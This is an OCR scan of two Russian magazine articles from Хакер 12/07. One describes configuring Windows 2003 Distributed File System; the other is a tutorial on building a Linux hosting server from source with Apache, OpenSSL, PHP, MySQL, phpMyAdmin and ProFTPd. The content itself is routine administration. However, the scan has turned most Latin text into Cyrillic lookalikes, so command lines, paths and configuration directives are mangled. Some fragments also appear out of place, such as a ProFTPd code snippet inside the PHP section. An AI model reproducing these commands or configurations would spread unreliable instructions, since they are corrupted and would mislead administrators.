файла. При обращении клиента он просто перебрасывается в нужный ему 
каталог. На месте источника, на который указывает ссылка, может быть 
любая операционная система, к ресурсам которой можно обратиться, 
используя ІЛМС (ѴѴіпсІошз, Ілпих, хВ5Ю, ИеиѴѴаге) . Физические объекты, 
связанные ссылками с БЕЗ, называются целевыми объектами (іаг§еіз) 
или репликами (геріісз) . Но удобство для пользователей и администрато- 
ров — далеко не самое важное преимущество ОРЗ. Дело в том, что с одним 
логическим именем может быть связано несколько общих ресурсов, в 
которых хранится идентичная информация. Такой набор альтернативных 
общих ресурсов, связанных с одним логическим именем БЕЗ, называется 
набором реплик. И если общие ресурсы находятся в одном пространстве 
доменного корня ОРЗ и располагаются на серверах ѴѴіп2к или \Ѵіп2кЗ, есть 
возможность настроить автоматическую синхронизацию информации 
между ними. Пользователь, обратившийся к ОРЗ, обычно перенаправ- 
ляется к ближайшей реплике и, если она недоступна, он посылается к 
альтернативному ресурсу. Для уменьшения нагрузки на сервер БЕЗ на 
стороне клиента данные кэшируются, поэтому при частом обращении к 
одному и тому же ресурсу каждый раз запрос к ОРЗ не производится. Таким 
образом, автоматическое резервирование важной информации, реализо- 
ванное в ОРЗ, еще и повышает отказоустойчивость всей системы (выход 
из строя одного сервера или дискового устройства не повлияет на работу 
пользователей) . Хотя следует помнить, что ОРЗ не создавалась для работы 
с часто обновляющимися данными, и особенно для тех случаев, когда файл 
одновременно может обновляться в нескольких местах (в ОРЗ остается та 
версия файла, где были внесены последние изменения) . 

В реализации ОРЗ в ѴѴіп2к можно было разместить только одно простран- 
ство имен, в ѴѴіп2кЗ их может быть уже несколько. В ѴѴіп2кЗ К2 появилась 
новая версия этой системы — ОРЗ Катезрасез, в которой многие вопросы 
уже решены. За репликацию данных в ѴѴіп2кЗ ЗР1 и 5Р2 отвечает РК5 (Рііе 
Керіісагіоп Зегѵег) , в Ѵ\Йп2кЗ К2 — ОРЗ Керіісагіоп. Главное их различие 
заключается в том, что в ЕК8 самым маленьким объектом, подлежащим 
репликации, является файл, в то время как в ОРЗ Керіісагіоп используется 
более совершенная технология КОС (Кетоне Бігіегепгіаі Сотргеззіоп), 
которая умеет копировать только изменившиеся части файла, а функция 
сгозз-гііе КОС меньше нагружает канал при копировании новых файлов. 
Таким образом, использование ОРЗ еще и уменьшает нагрузку на сеть, что 
особенно актуально для удаленных офисов с недостаточной пропускной 
способностью. В службе ОРЗ не используется никаких дополнительных 
средств обеспечения безопасности. При обращении к Таг^еТз проверяются 
только права доступа файловой системы и установленные для этих объек- 
тов разрешения в каталоге Асгіѵе БігесНогу. 

ЭТИ РАЗНЫЕ КОРНИ 

Исходной точкой для всех имен дерева ОРЗ служит корень распределенной 
файловой системы. Фактически корень — это некоторый общий ресурс. 



находящийся на сервере, все остальные логические имена системы ОРЗ 
будут подключаться как следующие иерархические уровени. Корни в ОРЗ 
могут быть двух видов, отличающихся способами хранения данных и воз- 
можностями. Изолированный (автономный) корень (Зііапгіаіопе ОРЗ) не 
связан с Асгіѵе БігесЮгу, и все ссылки на сетевые ресурсы хранятся в реест- 
ре самого сервера ОРЗ. Такой корень не использует ОРЗ Керіісагіоп, то есть 
не предполагает копирование информации на другие ресурсы, и поэтому 
не обеспечивает отказоустойчивости. При выходе из строя сервера ОРЗ 
вся иерархия становится недоступной, хотя пользователи могут обра- 
щаться к ресурсам напрямую. К слову, несколько серверов Згапсіаіопе ОРЗ 
способно работать в кластере, поэтому эта проблема может быть решена. 
Если сервер ОРЗ является членом домена, используется доменный корень 
(Ботаіп-Ъазесі ОРЗ) . При таком варианте можно подключать несколько 
реплик и использовать ОРЗ Керіісагіоп для репликации как самого корня, 
так и ссылок ОРЗ. Если в Ботаіп-Ъазесі ОРЗ корни находятся на компью- 
терах под управлением ѴѴіп2к и ѴѴіп2кЗ, то они называются Міхесі тогіе 
гіотаіп ОРЗ. 

При доменном ОРЗ вся информация о пространстве имен находится на 
контроллере домена, к которому периодически обращается сервер ОРЗ. 
Учитывая синхронизацию между ОРЗ в домене, которая становится все 
более сложной при каждом изменении структуры, эти запросы могут 
быть узким местом в системе, поэтому в этом случае также есть неко- 
торые ограничения. Так, в ѴѴіп2к существовало ограничение в виде 16 
корней для одного пространства имен. В ѴѴіп2кЗ это ограничение снято, 
так как сервер БЕЗ теперь может обращаться к любому ПС, а не только к 
эмулятору РПС. Второе ограничение доменных корней связано с тем, что 
вся структура хранится в специальном объекте, который также необходи- 
мо дублировать на всех БС при любом малейшем изменении в структуре 
ОРЗ. В документации рекомендуется ограничивать максимальный 
размер объекта 5 Мб, что соответствует приблизительно 5000 ссылок 
(каталогов) . Эта величина зависит от многих параметров (длины имени 
ссылок, наличия и размера комментариев и пр.), которые также хранятся 
в этом объекте. Но в среднем БЕЗ редко превышает 50-100 ссылок, и после 
первоначальной настройки она остается в основном статичной, а значит, 
часто дублироваться не будет, и этих ограничений достичь просто не удас- 
тся. Кстати, в будущей ѴѴіпсІоѵѵз 2008 ограничение в 5000 ссылок уже сня- 
то, но для этого все серверы должны работать под управлением Ьоп§1югп. 
Для ЗСапсІаІопе БЕЗ рекомендованный лимит ссылок на порядок выше и 
составляет 50 000 ссылок. 

НАСТРОЙКА йР5 

Для примера настроим БЕЗ на компьютере под управлением ѴѴіп2кЗ с 
ЗР2, в 5Р1 все настройки аналогичны. В настройках БЕЗ в К2 и ѴѴіп2к есть 
некоторые различия, но не настолько глобальные, чтобы не разобраться 
самостоятельно. Все управление распределенной файловой системой вы- 
полняется централизованно с помощью оснастки ММС «Распределенная 
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файловая система ЭРЗ», которую можно вызвать во вкладке «Администри- 
рование» «Панели управления» ѴѴіпсІоѵѵз. С ее помощью можно создавать 
и удалять корни, подключаться к любым корням БЕЗ. Удобно, что в одной 
вкладке может отображаться несколько корней ОРЗ. 

В случае работы корня в Міхеб тобе ботаіп ОРЗ, когда реплики и корни 
ОРЗ располагаются на компьютерах под управлением разных версий 
ѴѴіпбоѵѵз, управление ОРЗ необходимо производить с компьютера, 
работающего под ѴѴіп2кЗ . Как вариант — можно установить пакет ѴѴіп2кЗ 
АбтіпізГгайоп Тооіз Раск (абтіпрак.тзі), который лежит в свободном 
доступе на сайте корпорации. Тогда для управления можно использовать 
и компьютеры с ѴѴіпХР. Информацию об этом пакете ты найдешь по адресу 
5иррогЦтісго50Й.сот/кЬ /304718 . 

Кроме этого, для работы с БЕЗ также можно использовать утилиты 
командной строки сКзстб.ехе и сКзШіІ.ехе. Последняя имеет больше 
возможностей, но по умолчанию не включена в состав операционной 
системы. Чтобы ее использовать, необходимо установить пакет ѴѴіп2кЗ 
ЗирроіГТооІз. Обрати внимание, что для успешной установки ЗирроП 
Тооіз требуется скачать два файла: зіірцюіз.тзі и зирроП.саЪ. 

Для создания нового корня вызываем оснастку, щелкаем мышкой по заго- 
ловку и в контекстном меню выбираем «Создать корень» (Ие\ѵ КооО . Как 
вариант — можно использовать аналогичный пункт в меню «Действие». 
Появляется мастер создания нового корня (Иеѵѵ Коо! ѴѴігагб), следуем его 
подсказкам. На втором шаге задаем тип создаваемого корня (доменный 
или изолированный), указываем несущий домен и сервер. После проверки 
соединения с выбранным сервером вводим имя корня. Обрати внима- 
ние на то, как будет выглядеть ИМС-путь к новому корню : по умолчанию 
\\зегѵег\пате5Ішге. 

Так как на данный момент общего каталога не существует, на следующем 
шаге нужно выбрать локальный каталог, который будет использоваться в 
качестве общего. В этом каталоге будут находиться не реальные данные, а 
ссылки, указывающие на физическое расположение данных. Мастер созда- 
ет ресурсы, разрешающие чтение и выполнение членам группы «Пользова- 
тели». При необходимости следует скорректировать разрешения. Теперь 
нажимаем кнопку «Готово»; новый корень появится в окне консоли. 

Если сервер работает под управлением \Ѵіп2кЗ, аналогичным образом 
создаем и другие корни. С помощью команды «Проверить статус» (СЬеск 
ЗнаШз), вызываемой из меню консоли или контекстного меню, можно 



проверить состояние реплики. Состояние будет указано в одноименном 
столбце, и рядом с именем появится кружок с отметкой. Если она зеленого 
цвета, значит все нормально. Для проверки можно зайти по указанному 
ІЛМС или использовать на локальном компьютере команду пеі зЬаге, а на 
удаленном — пеі: ѵіеѵѵ сотрШ:ег_пате. Команда сКзигіІ /Коо1::\\5егѵег\ 
зііаге /Ѵіеѵѵ покажет информацию о БЕЗ. 

хіГзиЬіІ /КооЪ : \\зегѵег .сош\ГігзЬ /Ѵіеѵ? 

БЕЗ ІШіІіЦу Ѵегзіоп 5 . 2 (ЬиіІЬ оп 5.2.3790.3959) 

Ботаіп КооЦ ѵ/іСЪ. О Ьіпкз [ВІоЬ Зіге: 284 ЬуСез] 

КооЦ Ыате=" \\ЗЕКѴЕЕ\Гігз1:" СоттепЦ= " ИігзЬ КооЦ" 
5ЦаЦе="1" ТітеоиЦ="300 " 

ТагдеЬ Зегѵег="СЕІШЕКЗ" Ео1сЗег=" ГігзЦ" ЗЬаЬе="2" 

[ЗіЦе : БеГаиП:-РігзЬ-Зі1:е-Ыаше] 

После создания корня его можно опубликовать в Асгіѵе ПігесНогу. Для этого 
в контекстном меню выбираем «Свойства», переходим на вкладку «Пуб- 
ликация» и устанавливаем флажок «Опубликовать этот корень в Аснѵе 
БігесЮгу». Доменные корни публикуются автоматически и в обязатель- 
ном порядке. 

СОЗДАНИЕ ССЫЛОК 

После создания корня можно начинать подключать общие ресурсы. Для 
этого в том же контекстном меню выбираем пункт «Создать ссылку» (Ие\ѵ 
Ьіпк) . В появившемся окне «Новая ссылка» в поле «Имя ссылки» вводим имя 
ссылки, под которым она будет доступна в БЕЗ, затем чуть ниже — ІЛМС-путь 
к целевому каталогу (должен уже существовать) . Для поиска общих ресур- 
сов можно использовать кнопку «Обзор», чуть ниже можно изменить время 
кэширования этой ссылки для клиентов БЕЗ (по умолчанию 1800 сек) . По 
окончании нажимаем кнопку ОК. Команда сИзиШ /ѵіеѵѵ должна показать 
состояние всех подключенных ссылок и их свойства. Если в сети работает 
несколько серверов, есть возможность добавить реплику, указывающую на 
альтернативную ссылку. Реплика на корень или отдельный объект создается 
аналогично, только в первом случае в контекстном меню выбираем пункт 
«Создать корневую целевую папку», а во втором — «Создать папку». 

Общие ресурсы, с которыми будет производиться репликация, должны 
располагаться в разделах с файловой системой ІѵГГЕЗ на компьютерах, 
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работающих под управлением серверных версий ѴѴіпсІоѵѵз от 2000 (лучше 
2003) . В поле «Путь к целевой общей папке» появившегося окна вводим 
или при помощи кнопки «Обзор» указываем общий ресурс, располагаю- 
щийся на другом компьютере. В том случае если для синхронизации ин- 
формации между этими ресурсами планируется использовать альтерна- 
тивные программы (или синхронизация будет производиться вручную), 
следует снять флажок «Добавить эту целевую папку к набору репликации» 
(АсШ ГІтІ5 Паттен Но пЬе геріісагіоп зеН) . Нажимаем ОК, и появляется мастер 
настройки репликации (Сопй§иге Керіісагіоп ѴѴігагсІ), который помо- 
жет выбрать мастер-реплику и топологию репликации. На первом шаге 
указываем каталог, который будет использоваться в качестве основного 
целевого. Вся информация из этого каталога затем будет скопирована в 
другую папку. Последняя должна быть пустой; если в ней есть файлы, они 
будут скопированы во временный каталог, а затем удалены. Если общий 
ресурс по каким-либо причинам не подходит для репликации (например, 
расположен не в разделе с 1МТР5), он будет отмечен красным крестиком; 
при попытке перейти к следующему шагу мастер предложит указать 
другую ссылку или закончить работу. 

Нажатием кнопки «Промежуточное хранение» (ЗГа^іп^ РоЫег) можно 
изменить расположение каталога, который будет использоваться для вре- 
менного хранения реплицируемых данных. По умолчанию этот каталог 
размещается в разделе, отличном от того, на котором находится общий 
ресурс, связанный с БРЗ. Далее мастер предложит выбрать топологию 
репликации. Необходимо будет указать один из следующих вариантов: 

• Кольцо (Кіп§) — все реплики обмениваются информацией с двумя 
соседними; 

• Звезда (НиЪ апб зроке) — указывается основная ссылка, с которой и будут 
обмениваться информацией все остальные реплики; 

• Полная сетка (МезЬ) — все реплики обмениваются информацией друг с 
другом; 

• Особая (СизИот) — позднее администратор самостоятельно настроит 
репликацию для каждой пары серверов. 

Кольцевая топология установлена по умолчанию и подходит для большинст- 
ва случаев. В идеале выбранная топология репликации должна соответство- 
вать схеме сети. Например, если есть центральный офис, где располагаются 
основные ресурсы, а многочисленные филиалы подключаются к ним по мере 
необходимости, то в этом случае больше подойдет схема «Звезда». Если ниче- 
го из предустановок не подходит, следует обратиться к пункту «Особая». 
После создания реплики для ссылки соответствующий ей значок в окне ос- 
настки изменится. В контекстном меню также появятся два новых пункта: 
«Отобразить статус репликации»/«Скрыть статус репликации» и «Оста- 
новить репликацию». В поле статуса репликации может быть один из трех 
результатов. Если процесс репликации завершился нормально, на значках 
будут зеленые флажки. Красный крестик на значке реплики укажет, что 
она в данный момент недоступна; в поле «Состояние» подпись поменяется 
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на «Автономный». Если в проверяемой ссылке недоступны лишь некото- 
рые реплики, в значке появится желтый восклицательный знак. 

Перед удалением одной из альтернативных реплик сначала следует за- 
претить репликацию. При возобновлении репликации тебя встретит тот 
же мастер. Если сервер является контроллером домена, вместе со всеми 
данными БРЗ будет реплицировать и содержимое тома ЗУЗѴОЬ. Поэтому 
следует помнить, что, до тех пор пока не произойдет полная репликация 
всех реплик, начинать любые изменения в конфигурации БР5 очень рис- 
кованно, это может нарушить работоспособность всего домена. 

Если выбранный вариант топологии репликации по каким-либо причинам 
не подошел, топологию репликации впоследствии можно легко изменить, 
выбрав окно свойств соответствующей ссылки и перейдя во вкладку «Репли- 
кация». Здесь находится еще несколько полезных настроек. По умолчанию 
репликация выполняется постоянно; нажав кнопку «Расписание», можно 
изменить расписание репликаций для всех подключений. Чуть ниже указы- 
ваются фильтры доя файлов и подпапки, которые не будут реплицировать- 
ся. Нажимаем «Изменить» и вводим шаблоны файлов или подкаталогов. 

Для принудительной репликации информации, хранящейся на опреде- 
ленном сервере, можно воспользоваться утилитой №іг8ІМ.ехе, которая 
входит в состав пакета ЗиррогТ Тооіз. Команда проста: піігзиій роіі /по\ѵ 
зегѵег.сот. Чтобы увидеть установленные временные интервалы, через 
которые производится репликация, следует ввести Шй'зШІ роіі. Все уста- 
новки доступны по команде ШІтзіЛІ вей зегѵег.сот. 

В окне свойств общего ресурса, представленного в службе ОРЗ, появится 
еще одна вкладка — БЕЗ. Открыв ее, пользователь может просмотреть, с 
какими общими папками сопоставлена эта ссылка, проверить состояние 
реплики, выбрать активную реплику, к которой он будет перенаправлять- 
ся в первую очередь. 

Администратору для контроля следует почаще заглядывать в журнал 
«Администрирование -> Просмотр событий -> Служба репликации фай- 
лов», где можно найти информацию обо всех событиях, происходящих со 
службой РК5. ИНИ 



ѴѴіпсІоѵѵз 
Зегѵег 2003 К2 

Появление К2 в 2005 году прошло тихо и незаметно. Эта версия, 
созданная на основе ѴѴіп2кЗ с пакетом обновления 5Р1, расширяет 
возможности подключения локальных и удаленных ресурсов и управ- 
ления ими. К2 является как бы промежуточной версией между \/Ѵіп2кЗ 
и ѴѴіп2к8 и поддерживается параллельно с ѴѴіп2кЗ. Нужно сказать, что 
реализация и настройки БРЗ в ѴѴіп2кЗ и К2 несколько различаются. 
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ѴѴЕВ- СЕРВЕР ДЛЯ 
ХОСТИНГА НА 
ОДНОМ ДЫХАНИИ 



ПОШАГОВОЕ РУКОВОДСТВО ПО НАСТРОЙКЕ СЕРВЕРА ДЛЯ ХОСТИНГА САЙТОВ 

Думаю, каждый когда-либо пытался сделать из своего компа веб-сервер. Кто-то для этого ставил под Вин- 
дой пакет со всеми прелестями (Арасйе + РНР + Му5>0Ь), кто-то компилил тарболлы из сорцов под фрю, но 
все без исключения вдумчиво вкуривали мануалы. В Сети полно документации по каждому из пакетов в 
отдельности, но, чтобы собрать полнофункциональный сервак, порой требуется не одна неделя. Сегодня я 
хочу показать, как можно быстро установить и настроить связку АрасЬе + ОрепВВЬ + РНР + Му5>0Ь + РЬртуа 
сітіп 4- РгоРТРб с чистого листа. Все это составляющие классического веб-сервера для хостинга сайтов. 



ЧТО ПОТРЕБУЕТСЯ 

Для экспериментов нам понадобится настроенный и рабочий Ілпих. В 
настоящее время любой дистрибутив имеет в своем арсенале продви- 
нутый менеджер пакетов, но мы откажемся от его использования. Все 
будем ставить исключительно из исходных текстов. На это есть ряд 
причин. Во-первых, так мы всегда сможем иметь самые свежие версии 
пакетов. Во-вторых, так появляется гибкость при конфигурировании. 
В-третьих, зависимость от системы — это подход Майкрософт. При 
установке из исходников название дистрибутива нам вообще должно 
быть безразлично. 

Лично у меня собрано два сервера на АЬТ Ьіпих. Аптайм грамотно настро- 
енного сервера на нормальном железе достигает нескольких лет, да и то 



все проблемы, как правило, от уборщиц и электромонтеров :) . 

Для написания статьи я качал самые свежие пакеты из стабильных, а 
именно ЬйрсІ-2.2.6, рЬр-5.2.4, ту5^1-5.0.45, ргоВрсІ-1.3.1, орепз5І-0.9.8§, 
тосІ_55І-2.8.30 (весь упомянутый софт можно найти на прилагаемом к 
журналу диске) . В принципе, все вышеуказанное ты можешь поставить 
из прекомпилированных для своей системы пакетов, но в таком случае 
расположение конфигов и каталогов может отличаться от описываемого 
в статье. 

УСТАНОВКА АРАСНЕ+0РЕЫ55І.+РНР+МѴ50І. 

Начинать лучше с ОрепЗЗЬ. Переходим в каталог с архивом и вводим 
следующее: 
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# каг -хі орепзвІ-0 . 9 . 8д. Раг . дт 

# сб орепззІ-0 . 9 . 8д 

# . /сопіід 

# шаке; шаке кезк ; шаке іпзРаІІ 

Теперь ставим для ѵѵеЬ-сервера собственно сам ЗЗЬ-модуль. Внимание! 
При конфигурировании нужно обязательно указывать путь к исходни- 
кам Араске и ОрепЗЗЬ. Соответственно, оба архива уже должны быть 
распакованы: 

# Саг -хі кСРрб-2 . 2 . 6 . Раг . д 2 

# Саг -хС тоб_зз1-2 .8.30-1.3.39. Саг . дт 

# сб шоб_зз1-2 .8.30-1.3.39 

# ./сопСідиге \ 

--Ш-Рк-араске^ . . /кРСрб-2 . 2 . 6 \ 

--Ш-СІі-зз1= . . /орепззІ-0 . 9 . 8д \ 

--ѵ7ІСк-сП:=/изг/1оса1/араске2 /соп!/зз1 . сгС/зегѵег . сгС \ 
--■ш.Ск-кеу=/изг/1оса1/араске2/соп1/зз1 . кеу/зегѵег .кеу \ 
--рге1:іх=/изг/1оса1/араске2 

Далее по списку идет Араске. Собираем исходники и устанавливаем 
самым примитивным способом, но уже с сертификатами: 

# сб . . /ЬССрсІ-2 .2.6 

# ./сопСідиге --епаЫе-ззІ 

# шаке; шаке сегСіСісаСе; шаке іпзСаІІ 

Все собирается без проблем при условии, что отсутствуют неудовлетво- 
ренные зависимости. Если в процессе компиляции возникают ошибки, ни 
в коем случае нельзя компилировать с опцией Ч’ (игнорирование ошибок 
при сборке) . В противном случае сервер долго не проживет и, естественно, 
никак нельзя гарантировать его безошибочную и стабильную работу. 
После установки в каталоге /изг/1оса1/араске2 у нас появился Апач, кон- 
фиг которого лежит в подкаталоге сопТ Открываем кирсі.сопі 7 и добавляем 
три строки в начало файла: 

# ѴІ/и5Р/І_0САІ_/АРАСНЕ2/С0МР/НТТР0.С0МР 

ЗЗЬЕпдіпе оп 

ЗЗЬСегкіІісаРеРіІе /изг/1оса1/арас1іе2/соп1/зз1 . егк/ 
зегѵег . сгр 

ЗЗЬСегРіІісаРеКеуРіІе /изг/1оса1/арасЬе2/соп1/зз1 . 
кеу/зегѵег . кеу 

Теперь запускаем Араске следующим образом: 

# /изг/1оса1/араске2/Ъіп/к1:1:рб -зкагкззі 



И честно отвечаем на задаваемые вопросы. 

Теперь при переходе в браузере по кнр: //ІосаІкозЕ/ должна поя- 
виться страница с сообщением: «к ѵѵогкз ! ». То же самое происходит 
при переходе по кКрз: /ЛосаШозЕ/ . Это означает, что демон вполне 
работоспособен. Если при попытке запуска демон выдает ошибку, 
возможно, на 80-м или 443-м порту что-то уже висит. Проверить это 
можно так: 

# пеРзРаІ: -р Рср -а --пишегіс-рогСз I дгер *:80 

# пекзРак -р Рср -а --пишегіс-рогСз I дгер *:443 

Если порт действительно занят, виновный процесс можно убить по РГО или 
по имени, которые возвратят эти команды. 

В любом другом случае ошибки не должно произойти — по умолчанию 
конфиг настроен наипростейшим образом, а права на файлы расставлены 
корректно. 

Следующий шаг — инсталляция МуЗС^Ь: 

# Раг -хі шуздІ-5 . 0 . 45 . Саг . дт 

# сб шуздІ-5 . 0 . 45/ 

# . /сопіідиге 

# шаке; шаке іпзкаіі 

Теперь создадим группу и пользователя, с правами которого будет рабо- 
тать демон: 

# дгоирабб шузді 

# изегабб -д шузді шузді 

Далее у нас идет создание служебных баз данных и таблиц. Для этого пере- 
ходим в подкаталог зегірщ и запускаем файл тузд1_т51:а11_с1Ъ: 

# . /тузд1_іпзСа11_бЬ 

Просмотри внимательно результат стандартного вывода скрипта на нали- 
чие ошибок. Если все нормально, стартуем демон: 

# /изг/1оса1/Ьіп/шузд1б_за1е & 

По умолчанию администратором баз данных является пользователь гоон 
без пароля. Это не есть гуд. В целях безопасности мы должны сразу устано- 
вить свой пароль: 

# /изг/ІосаІ/Ъіп/шуздІабшіп -и гооР раззжэгб 'новый па- 
роль ' 

Все, МуЗС^Ь больше не трогаем. Так как Араске и МуЗС^Ьуже инсталлирова- 
ны, при сборке РНР следует указать пути до архз и шузді: 



ХАКЕР 12 /108/ 07 



► 151 



>> ХАКЕР.РКО 





эраузер предлагает принять сертификат 



# Ьаг -х:Е рЬр-5 .2.4. каг .Ьг2 ; ссі рЬр-5 .2.4/ 

# ./соп^ідиге --ѵ7Ікк-архз2=/изг/1оса1/арас!іе2/Ъіп/архз \ 

--ѵ7ІкЪ-тузд1=/изг/1оса1 

# таке; таке Ьезк; таке іпзРаІІ 

Теперь мы должны заставить Араске распознавать РНР-файлы как ис- 
полняемые скрипты, а не просто выводить их содержимое в виде текста. 
Для этого идем в его конфиг и добавляем в начало файла три директивы 
АбсГГуре: 

# ѴІ/ІІ5ГС/І_0САІ_/АРАСНЕ2/С0МР/НТТР0.С0МР 

АсІсІТуре арріісакіоп/х-кккрсі-ріір .рЬр 
АсІсІТуре аррІісакіоп/х-ЬкІірсІ-рІір .рккті 
АсІсІТуре арріісакіоп/х-іікіірсі-ріір-зоигсе .рЬрз 



} 

Ьгеак; 

} 

После этого смело компилируй: 

# . /сопРідиге 

# таке; таке іпзЬаІІ 

Файл запуска установился как /изг/ІосаІ/зЪіп/ргоЙрсІ. Запусти его и про- 
верь в РТР-клиенте адрес Й:р://1осаШо5і:/. Если каталог открылся, значит 
установка прошла успешно. 

Вот и все ! Но в практическом плане пока наш сервер ничего собой не пред- 
ставляет. Для того чтобы запускать его в продакшн, необходима дальней- 
шая настройка. 



После этого ищем строку «ОігесШгуІпсіех іпбех.ІПтІ» и меняем ее на 
«ОігесГогуІпбех іпсіех.ііііті іпбех.іігті.ѵаг тбех.ркр». Перезапускаем Ьирб- 
демон: 

# /изг/1оса1/арас1іе2/Ьіп/арас]іес1:1 гезііагі: 

Далее создаем в /и5г/1оса1/арасЬе2/Ьі:сІос5 каталог ркртуасітіп и 
копируем в него все файлы из тарболла рЬрМуАбтіп-2.10.2. Теперь 
можно проверить работоспособность Араске в связке с РНР + МуЗС^Ь. 
Скопируем файл сопіі^.затріе.іпс.ркр в сопіі^.іпс.ркр (тот, что лежит в 
/изг/1оса1/араске2/кі:с1ос5/ркртуас1тіп), раскомментируем в нем строки 
сопітоіизег и сопітоіразз, впишем туда пользователя гооГ и его пароль и 
добавим в Ыо\ѵйзк_5есге1: любую строку из произвольных символов (она 
используется для идентификации соокіе) . Теперь идем на кпр : //Іосаікозі:/ 
ркртуасітіп/ и, если все правильно собрано, оказываемся в админке базы 
данных! Все, с установкой веб-сервера разобрались. Переходим к РТР. 

УСТАНОВКА РКОРТРР 

В качестве РТР-серверая давно для себя выбрал РгоРТРб. Единственная 
проблема, возникающая при его использовании, заключается в том, что 
если закачка файлов производится с ѴѴіпсІоѵѵз-машин, то из названий 
русских файлов вырезаются буквы ы, ь, э, ю, я. Дело в том, что РгоРТРб про- 
пускает весь свой трафик через Теіпеі:, который воспринимает символы 
с кодами 251-255 как управляющие последовательности и вырезает их. 

Но не стоит отчаиваться, такое поведение можно исправить небольшим 
вмешательством в файл згс/пегіо.с. Просто удали из него строки: 

зѵ7ІСс1і (тосіе) { 
сазе ІАС : 

. . . часть кода пропущена . . . 
тосіе = ср; 

сопСіпие; 



НАСТРОЙКА 

Для начала следует определиться, что нам действительно необходимо 
получить на выходе. Нарисуем примерно такую картину: 

1 . Наш сервер имеет доменное имя тузегѵак.ги. 

2. На сервере может располагаться любое количество сайтов, доменные 
имена которых Араске должен распознавать. 

3. Сервер имеет статический ІР-адрес с выходом в интернет через интер- 
фейс егкО. 

4. Снаружи должны быть видны следующие порты: кпр(80), Йр(21). 

5. Все остальные порты должны быть закрыты на интерфейсе еЛО, но 
открыты на всех остальных для администрирования сервера из доверен- 
ных сетей. 

6. Право на редактирование каталога сѵѵеЬ-файлами по РТР будут иметь 
только пользователи-владельцы сайтов под своими паролями. 

7. Редактировать главный сайт компании тузегѵак.ги по РТР будет только 
пользователь абтіп. 

9. Все сервисы должны запускаться автоматически после перезагрузки 
системы. 

Итак, создадим каталог /згѵ, где будем хранить наш сайт, и подкаталоги 
с§і-Ьіп и кгбосз для с§і-скриптов и для кгті-документов соответственно. 
Добавляем пользователя абшіп, которому в качестве домашнего каталога 
назначаем /згѵ, не забыв поменять владельца: 

# тксііг -р /згѵ/ {сді-Ъіп,кСсІосз} 

# изегасМ -сі /згѵ абтіп 

# раззжі абтіп 

# скоѵт асЭтіп /згѵ 

# сктосі 775 /згѵ 

Теперь идем в /изг/іосаі/еис/ргоігрб.сопі и полностью удаляем секцию 
<Апопутои5> . Таким образом мы перекрываем кислород всем аноним- 
ным пользователям. Перезапускаем ргойрб: 
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# кіііаіі ргоббрб 

# /изг/ІосаІ/зЪіп/ргоббрб 

И пробуем зайти. После того как доступ по РТР будет открыт, можно смело 
закидывать Ьиті-документы в каталог /згѵ/ЬіісІосз. Теперь займемся 
настройкой АрасЬе. 

Открываем /и5г/1оса1/арасЬе2/сопб/Ь1:1:рс1.сопби правим следующим 
образом: ЗегѵегАбтіп — сюда пишем свой ящик; везде меняем /изг/іосаі/ 
арасЬе2/Ьціосз на /згѵ/Ыхіосз, а /и5г/1оса1/арасЬе2/с$і-Ъіп на /згѵ/с§і- 
Ьіп. После внесенных изменений снова перезапускаем демон: 

# /изг/1оса1/арасЬе2/Ъіп/арасЬесб1 гезбагб 

Теперь внимание! Строка «сЬтод 775 /згѵ» в нашем случае решающая. Так 
как владельцем каталога у нас является абтіп, а группа — гоон, доступ д ля них 
должен быть открыт полностью, чтобы можно было свободно манипулировать 
файлами по РТР и локально. Для всех остальных пользователей выставляются 
права только на чтение и на запуск скриптов. Только в этом случае можно 
гарантировать корректную работу и должный уровень безопасности. 

Хотя *піх-серверы и считаются надежными, от перезагрузок не застрахо- 
ван никто. И будет тоскливо, если после каждого включения нам придет- 
ся стартовать все демоны вручную. Чтобы избежать проблем в будущем, 
лучше сразу развентилировать этот вопрос, поместив все стартовые 
файлы в каталог /еіс/іпібсі. Кроме того, у нас появится возможность эле- 
гантно управлять сервисами (к примеру, зегѵісе арасЬе гезнаи/знор/зііагі:) . 
В случае с АрасЬе все решается достаточно просто — выполни команду: 

# ср /изг/1оса1/арасЬе2/Ъіп/арасЬесб1 /ебс/іпіб . б/ 
арасЬе 

Для МуЗС^Ь строка установки демона в качестве сервиса будет выглядеть 
так: 

# ср /изг/1оса1/Ъіп/тузд1б_заі:е /ебс/іпіб . б/тузді 

К сожалению, для РгоРТРП разработчики не позаботились выложить гото- 
вый скрипт для іпібсі, поэтому его код мы приводим на диске. 

Если ты не хочешь, чтобы все новые сервисы стартовали по умолчанию 
на пятом уровне запуска, создай ссылки в соответствующих гс.б вручную. 
Лично у меня все поднимается на третьем гипіеѵеі’е. После этого можешь 
смело перезагрузиться и протестировать работу. 

ПАРУ СЛОВ О БЕЗОПАСНОСТИ 

Не уделить внимание безопасности мы просто не можем. Ведь оттого, 
насколько грамотно настроен доступ к нашему серверу снаружи, зависит и 
жизнь сайтов, которые у нас будут хоститься. 

В первую очередь стоит обратить внимание на открытые порты. Совсем ни к 
чему, например, оставлять открытым порт на МуЗСД. Самый эффективный 
способ отфильтровать возможные вторжения — это использовать ІршЫез : 

# ірбаЫез -А ІЫРІІТ -і ебЬО -р бср -т тиібірогб --брогбз 

33 06, . . .<3десь через запятую можно указать порты, ко- 
торые мы не будем оставлять открытыми наружу > КЕбЕСТ 

--^е^есб-тбЬ істр-рогб-ипгеасЬаЪІе 

Естественно, это будет работать только в том случае, если интерфейс ебіО 
смотрит в интернет. 

Вот еще несколько советов по безопасности: 

1 . Ни в коем случае не используй простые пароли! Стойкий пароль должен 
состоять как минимум из восьми символов и включать чередующиеся 
заглавные, строчные буквы, спецсимволы и цифры. 

2. Не устанавливай для разных административных задач одинаковые 
пароли. 

3. Подумай несколько раз, прежде чем устанавливать права на файлы или 
каталоги. 777 — это далеко не лучшие права. 



ДОБАВЛЕНИЕ НОВЫХ САЙТОВ 

Итак, у нас есть каталог /згѵ, в котором мы храним наш главный сайт. 

Но в случае хостинга одним сайтом, естественно, не обойтись. Можно, 
конечно, создать каталоги для других сайтов внутри /згѵ и обращаться к 
ним « Ьцр: //тѵзегѵак.ги/риркіп ». но это очень неудобно, тем более что 
АрасЬе обладает всеми возможностями для решения этой проблемы с по- 
мощью виртуальных хостов. Есть два вида виртуальных хостов: отдельные 
для каждого ІР-адреса и использующие один ІР (пате-Ьазеб хосты) . Мы 
будем использовать последние. Теперь представим, что нам дали заказ на 
хостинг сайта питЬег2.ш . 

В первую очередь мы должны добавить группу для новых пользователей и 
создать в этой группе соответствующего пользователя: 

# дгоирабб Ьозбіпд 

